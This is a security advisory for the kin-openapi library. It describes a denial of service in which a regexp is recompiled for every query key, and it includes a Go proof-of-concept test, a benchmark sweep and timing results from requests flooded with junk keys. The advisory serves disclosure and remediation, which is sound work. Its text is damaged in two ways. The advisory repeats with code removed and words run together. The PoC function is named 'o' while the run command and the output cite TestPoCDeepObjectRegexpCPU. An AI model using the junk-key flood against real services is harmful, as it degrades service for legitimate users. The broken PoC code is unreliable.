Summary
openapi3filter decodes deepObject-style query parameters by looping over every key in the request's query string. Inside that loop it recompiles a loop-invariant regular expression on every iteration. The pattern depends only on the spec-defined parameter name, not on the loop variable, so it is compiled N times for N query keys instead of once. Because the number of query keys is attacker-controlled and unbounded, a single request with many junk query keys forces a proportional number of regexp.MustCompile calls, consuming CPU. A handful of concurrent requests can saturate all cores — an uncontrolled-resource-consumption denial of service.
This is not ReDoS: the pattern is fixed (^<param>\[) and matches in linear time. The cost is the repeated compilation of an invariant regexp, once per attacker-supplied query key.
Details
In openapi3filter/req_resp_decoder.go, the deepObject branch of urlValuesDecoder.DecodeObject builds a per-parameter property map by iterating over all query keys:
case "deepObject":
propsFn = func(params url.Values) (map[string]string, error) {
props := make(map[string]string)
for key, values := range params { // req_resp_decoder.go:689
if !regexp.MustCompile(fmt.Sprintf(`^%s\[`, regexp.QuoteMeta(param))).MatchString(key) { // :690
continue
}
matches := deepObjectBracketRE.FindAllStringSubmatch(key, -1)
...
}
...
}
The regexp built at req_resp_decoder.go:690 depends only on param — the parameter name defined in the OpenAPI spec — which is constant for the whole loop. Yet regexp.MustCompile(...) is invoked inside the for key, values := range params loop at req_resp_decoder.go:689, so it is recompiled once for every key present in the query string.
Contrast this with the already-hoisted, package-level regexp used two lines below:
var deepObjectBracketRE = regexp.MustCompile(`\[(.*?)\]`) // req_resp_decoder.go:41
deepObjectBracketRE is compiled exactly once at package init and reused. The per-parameter pattern at :690 should be compiled the same way (once, outside the loop), but instead is rebuilt on every iteration.
regexp.MustCompile costs on the order of a few microseconds per call. The number of iterations equals the number of query keys N, which the client fully controls (a ~1 MB URL holds roughly 100k keys). For each deepObject parameter M defined on the matched route, the request performs N × M compilations. The work is CPU-bound, happens during request validation before any handler logic, and scales linearly with request size, so an attacker converts cheap request bytes into expensive server CPU.
Affected code path: ValidateRequest → ValidateParameter → decodeStyledParameter → urlValuesDecoder.DecodeObject (the deepObject case). Any operation with at least one in: query, style: deepObject parameter is exploitable.
PoC
The following self-contained test (package openapi3filter_test) defines a spec with a single deepObject query parameter, then validates two requests that differ only in the number of junk query keys. Decoding time grows with the key count even though none of the junk keys are part of the parameter.
Save as openapi3filter/advisory_poc_test.go:
package openapi3filter_test
import (
"context"
"fmt"
"net/http"
"strings"
"testing"
"time"
"github.com/getkin/kin-openapi/openapi3"
"github.com/getkin/kin-openapi/openapi3filter"
"github.com/getkin/kin-openapi/routers/gorillamux"
)
const specDeepObjectParam = `
openapi: 3.0.0
info: {title: PoC, version: 1.0.0}
paths:
/f:
get:
parameters:
- name: filter
in: query
style: deepObject
explode: true
schema: {type: object, properties: {a: {type: string}}}
responses:
'200': {description: ok}
`
// TestPoCDeepObjectRegexpCPU demonstrates that decode cost scales with the
// number of (attacker-controlled) junk query keys because a loop-invariant
// regexp is recompiled once per key. It logs timings for two key counts and
// fails if the larger count crosses a clearly-abnormal CPU threshold.
func o(t *testing.T) {
loader := openapi3.NewLoader()
doc, err := loader.LoadFromData([]byte(specDeepObjectParam))
if err != nil {
t.Fatalf("load: %v", err)
}
if err := doc.Validate(loader.Context); err != nil {
t.Fatalf("validate: %v", err)
}
router, err := gorillamux.NewRouter(doc)
if err != nil {
t.Fatalf("router: %v", err)
}
run := func(n int) time.Duration {
var sb strings.Builder
sb.WriteString("/f?filter[a]=x")
for i := 0; i < n; i++ {
fmt.Fprintf(&sb, "&j%d=1", i)
}
req, _ := http.NewRequest(http.MethodGet, sb.String(), nil)
route, pathParams, err := router.FindRoute(req)
if err != nil {
t.Fatalf("route: %v", err)
}
start := time.Now()
_ = openapi3filter.ValidateRequest(context.Background(), &openapi3filter.RequestValidationInput{
Request: req, PathParams: pathParams, Route: route,
Options: &openapi3filter.Options{AuthenticationFunc: openapi3filter.NoopAuthenticationFunc},
})
return time.Since(start)
}
small := run(2000)
large := run(40000)
t.Logf("2000 junk keys -> %v ; 40000 junk keys -> %v (cost scales with key count)", small, large)
if large > 100*time.Millisecond {
t.Fatalf("VULNERABLE: 40000 junk keys cost %v of CPU for a single request (regexp recompiled per key); scales to full-core saturation", large)
}
}
Run:
go test ./openapi3filter/ -run TestPoCDeepObjectRegexpCPU -v
Observed output on the reference machine (Go 1.25, linux/amd64):
=== RUN TestPoCDeepObjectRegexpCPU
advisory_poc_test.go:71: 2000 junk keys -> 16.542072ms ; 40000 junk keys -> 258.146949ms (cost scales with key count)
advisory_poc_test.go:73: VULNERABLE: 40000 junk keys cost 258.146949ms of CPU for a single request (regexp recompiled per key); scales to full-core saturation
--- FAIL: TestPoCDeepObjectRegexpCPU (0.28s)
FAIL
FAIL github.com/getkin/kin-openapi/openapi3filter 0.293s
FAIL
Time grows roughly linearly with the key count (20× more keys → roughly 15× more time), and none of the j<i>=1 keys belong to the filter parameter — they are pure junk whose only effect is to add loop iterations, each of which recompiles the invariant regexp. A URL of about 1 MB (roughly 100k keys) pushes a single request into the 0.6 s range per deepObject parameter; a few concurrent such requests saturate every core.
Benchmark
The wall-clock PoC above is threshold-based and machine-sensitive. A testing.B benchmark built on the same spec (specDeepObjectParam) makes the scaling — and the per-request memory blow-up — reproducible and quantitative. It reuses the PoC's spec, router and request-shaping, sweeping the junk-key count and reporting ns/op, B/op, and allocs/op.
Save as openapi3filter/advisory_poc_bench_test.go (same package, alongside the PoC):
package openapi3filter_test
import (
"context"
"fmt"
"net/http"
"strings"
"testing"
"github.com/getkin/kin-openapi/openapi3"
"github.com/getkin/kin-openapi/openapi3filter"
"github.com/getkin/kin-openapi/routers/gorillamux"
)
// BenchmarkDeepObjectJunkKeys measures the per-request validation cost of a
// deepObject query parameter as the number of attacker-controlled junk query
// keys grows. Before the fix, cost scales linearly with the key count because a
// loop-invariant regexp is recompiled once per key; after the fix it is
// dominated by url-parsing and grows far more gently.
func BenchmarkDeepObjectJunkKeys(b *testing.B) {
loader := openapi3.NewLoader()
doc, err := loader.LoadFromData([]byte(specDeepObjectParam))
if err != nil {
b.Fatalf("load: %v", err)
}
if err := doc.Validate(loader.Context); err != nil {
b.Fatalf("validate: %v", err)
}
router, err := gorillamux.NewRouter(doc)
if err != nil {
b.Fatalf("router: %v", err)
}
for _, n := range []int{1000, 5000, 20000, 40000, 80000, 100000} {
var sb strings.Builder
sb.WriteString("/f?filter[a]=x")
for i := 0; i < n; i++ {
fmt.Fprintf(&sb, "&j%d=1", i)
}
target := sb.String()
b.Run(fmt.Sprintf("keys=%d", n), func(b *testing.B) {
b.ReportAllocs()
for i := 0; i < b.N; i++ {
req, _ := http.NewRequest(http.MethodGet, target, nil)
route, pathParams, err := router.FindRoute(req)
if err != nil {
b.Fatalf("route: %v", err)
}
_ = openapi3filter.ValidateRequest(context.Background(), &openapi3filter.RequestValidationInput{
Request: req, PathParams: pathParams, Route: route,
Options: &openapi3filter.Options{AuthenticationFunc: openapi3filter.NoopAuthenticationFunc},
})
}
})
}
}
Run:
go test ./openapi3filter/ -run '^$' -bench BenchmarkDeepObjectJunkKeys -benchmem -benchtime=2s
Results on the vulnerable code (Go 1.25, darwin/arm64, Apple M4 Pro):
| junk keys |
ns/op |
B/op |
allocs/op |
| 1,000 |
1,355,966 |
3,853,606 |
48,114 |
| 5,000 |
7,833,901 |
18,975,316 |
240,221 |
| 20,000 |
33,701,124 |
75,748,660 |
960,562 |
| 40,000 |
63,365,171 |
151,394,478 |
1,920,786 |
| 80,000 |
117,388,579 |
302,663,170 |
3,841,109 |
| 100,000 |
147,468,311 |
375,159,565 |
4,801,189 |
The benchmark quantifies the report along two axes the single-shot PoC only hinted at:
- CPU scales cleanly linearly, with no self-limiting plateau. Every metric grows in near-exact proportion to the junk-key count across two orders of magnitude: CPU, bytes and allocations all rise ~100× from 1k to 100k keys. At 100k keys a single request burns ~147 ms of CPU before any handler runs, and the cost does not taper off — an attacker gets full linear return on each additional junk byte, with the only ceiling being the request-size limit the server chooses to impose (if any).
- The recompilation dominates allocations, not just CPU. Each junk key both compiles a throwaway
*regexp.Regexp and allocates its compiled program as garbage: the vulnerable path costs a steady ~48 allocations and ~3.75 KB per junk key (375 MB and 4.8M allocations at 100k keys). So the same root cause drives both CPU exhaustion and heavy GC/allocator pressure — which is why this mechanism, while distinct from the adjacent memory-exhaustion advisory, also inflates memory traffic.
Impact
Uncontrolled CPU consumption (denial of service). Any service that uses openapi3filter.ValidateRequest (directly or via a router) to validate requests against a spec containing at least one in: query, style: deepObject parameter is affected. An unauthenticated attacker who can reach such an endpoint can send requests with large numbers of junk query keys; each request performs a number of regexp.MustCompile calls proportional to the request's query-key count times the number of deepObject parameters on the route. Because the work is CPU-bound and executed during validation (before any application handler runs), modest request rates can starve the process of CPU and degrade or deny service to legitimate clients. There is no impact to confidentiality or integrity.
Remediation
Hoist the invariant regexp out of the per-key loop: compile the ^<param>\[ pattern once per deepObject parameter (before iterating the query keys) and reuse the compiled *regexp.Regexp for every key — mirroring how the package-level deepObjectBracketRE (req_resp_decoder.go:41) is already handled. This makes decode cost independent of the junk-key count. Matching semantics are unchanged (the pattern still derives from the spec parameter name via regexp.QuoteMeta, so it stays panic-safe for any name), and *regexp.Regexp is safe for the reuse.
As a mitigation before upgrading, front affected endpoints with a limit on request/URL size or query-key count (e.g. at a reverse proxy or middleware), which bounds the number of loop iterations an attacker can force.
Notes
- Advisory relationship: Novel. Adjacent to previously reported memory-exhaustion issue in
deepObject decoding (via sliceMapToSlice), but this is a distinct CPU-exhaustion mechanism — repeated compilation of a loop-invariant regexp, once per attacker-supplied query key — not covered by that earlier memory-focused advisory.
Summary
openapi3filterdecodesdeepObject-style query parameters by looping over every key in the request's query string. Inside that loop it recompiles a loop-invariant regular expression on every iteration. The pattern depends only on the spec-defined parameter name, not on the loop variable, so it is compiledNtimes forNquery keys instead of once. Because the number of query keys is attacker-controlled and unbounded, a single request with many junk query keys forces a proportional number ofregexp.MustCompilecalls, consuming CPU. A handful of concurrent requests can saturate all cores — an uncontrolled-resource-consumption denial of service.This is not ReDoS: the pattern is fixed (
^<param>\[) and matches in linear time. The cost is the repeated compilation of an invariant regexp, once per attacker-supplied query key.Details
In
openapi3filter/req_resp_decoder.go, thedeepObjectbranch ofurlValuesDecoder.DecodeObjectbuilds a per-parameter property map by iterating over all query keys:The regexp built at
req_resp_decoder.go:690depends only onparam— the parameter name defined in the OpenAPI spec — which is constant for the whole loop. Yetregexp.MustCompile(...)is invoked inside thefor key, values := range paramsloop atreq_resp_decoder.go:689, so it is recompiled once for every key present in the query string.Contrast this with the already-hoisted, package-level regexp used two lines below:
deepObjectBracketREis compiled exactly once at package init and reused. The per-parameter pattern at:690should be compiled the same way (once, outside the loop), but instead is rebuilt on every iteration.regexp.MustCompilecosts on the order of a few microseconds per call. The number of iterations equals the number of query keysN, which the client fully controls (a ~1 MB URL holds roughly 100k keys). For eachdeepObjectparameterMdefined on the matched route, the request performsN × Mcompilations. The work is CPU-bound, happens during request validation before any handler logic, and scales linearly with request size, so an attacker converts cheap request bytes into expensive server CPU.Affected code path:
ValidateRequest→ValidateParameter→decodeStyledParameter→urlValuesDecoder.DecodeObject(thedeepObjectcase). Any operation with at least onein: query,style: deepObjectparameter is exploitable.PoC
The following self-contained test (package
openapi3filter_test) defines a spec with a singledeepObjectquery parameter, then validates two requests that differ only in the number of junk query keys. Decoding time grows with the key count even though none of the junk keys are part of the parameter.Save as
openapi3filter/advisory_poc_test.go:Run:
Observed output on the reference machine (Go 1.25, linux/amd64):
Time grows roughly linearly with the key count (20× more keys → roughly 15× more time), and none of the
j<i>=1keys belong to thefilterparameter — they are pure junk whose only effect is to add loop iterations, each of which recompiles the invariant regexp. A URL of about 1 MB (roughly 100k keys) pushes a single request into the 0.6 s range perdeepObjectparameter; a few concurrent such requests saturate every core.Benchmark
The wall-clock PoC above is threshold-based and machine-sensitive. A
testing.Bbenchmark built on the same spec (specDeepObjectParam) makes the scaling — and the per-request memory blow-up — reproducible and quantitative. It reuses the PoC's spec, router and request-shaping, sweeping the junk-key count and reportingns/op,B/op, andallocs/op.Save as
openapi3filter/advisory_poc_bench_test.go(same package, alongside the PoC):Run:
Results on the vulnerable code (Go 1.25, darwin/arm64, Apple M4 Pro):
The benchmark quantifies the report along two axes the single-shot PoC only hinted at:
*regexp.Regexpand allocates its compiled program as garbage: the vulnerable path costs a steady ~48 allocations and ~3.75 KB per junk key (375 MB and 4.8M allocations at 100k keys). So the same root cause drives both CPU exhaustion and heavy GC/allocator pressure — which is why this mechanism, while distinct from the adjacent memory-exhaustion advisory, also inflates memory traffic.Impact
Uncontrolled CPU consumption (denial of service). Any service that uses
openapi3filter.ValidateRequest(directly or via a router) to validate requests against a spec containing at least onein: query,style: deepObjectparameter is affected. An unauthenticated attacker who can reach such an endpoint can send requests with large numbers of junk query keys; each request performs a number ofregexp.MustCompilecalls proportional to the request's query-key count times the number ofdeepObjectparameters on the route. Because the work is CPU-bound and executed during validation (before any application handler runs), modest request rates can starve the process of CPU and degrade or deny service to legitimate clients. There is no impact to confidentiality or integrity.Remediation
Hoist the invariant regexp out of the per-key loop: compile the
^<param>\[pattern once perdeepObjectparameter (before iterating the query keys) and reuse the compiled*regexp.Regexpfor every key — mirroring how the package-leveldeepObjectBracketRE(req_resp_decoder.go:41) is already handled. This makes decode cost independent of the junk-key count. Matching semantics are unchanged (the pattern still derives from the spec parameter name viaregexp.QuoteMeta, so it stays panic-safe for any name), and*regexp.Regexpis safe for the reuse.As a mitigation before upgrading, front affected endpoints with a limit on request/URL size or query-key count (e.g. at a reverse proxy or middleware), which bounds the number of loop iterations an attacker can force.
Notes
deepObjectdecoding (viasliceMapToSlice), but this is a distinct CPU-exhaustion mechanism — repeated compilation of a loop-invariant regexp, once per attacker-supplied query key — not covered by that earlier memory-focused advisory.